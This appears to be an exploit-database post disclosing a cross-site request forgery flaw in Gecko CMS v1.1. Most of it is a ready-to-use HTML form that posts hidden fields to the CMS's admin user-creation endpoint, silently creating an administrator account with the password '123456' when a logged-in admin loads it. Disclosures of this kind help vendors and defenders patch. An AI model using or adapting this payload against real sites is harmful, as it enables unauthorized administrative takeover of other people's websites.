facebook facebook twitter rss

Gecko CMS v1.1 CSRF Vulnerability (Add Admin)

Author: AtT4CKxT3rR0r1ST , Published: 01-06-2012
Gecko CMS v1.1  CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.cmsgecko.com/
.:. Tested On Demo : http://demo.cmsgecko.com/
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/admin/index.php?p=user&sp=newuser">
<input type="hidden" name="jak_name" value="Mohamad"/>
<input type="hidden" name="jak_email" value="F.Hack@w.cn"/>
<input type="hidden" name="jak_username" value="Admin"/>
<input type="hidden" name="jak_usergroup" value="3"/>
<input type="hidden" name="jak_access" value="1"/>
<input type="hidden" name="jak_password" value="123456"/>
<input type="hidden" name="jak_confirm_password" value="123456"/>
<input type="hidden" name="save" value=""/>
</form>

</body>
</html>

####################################################################

Like us on Facebook :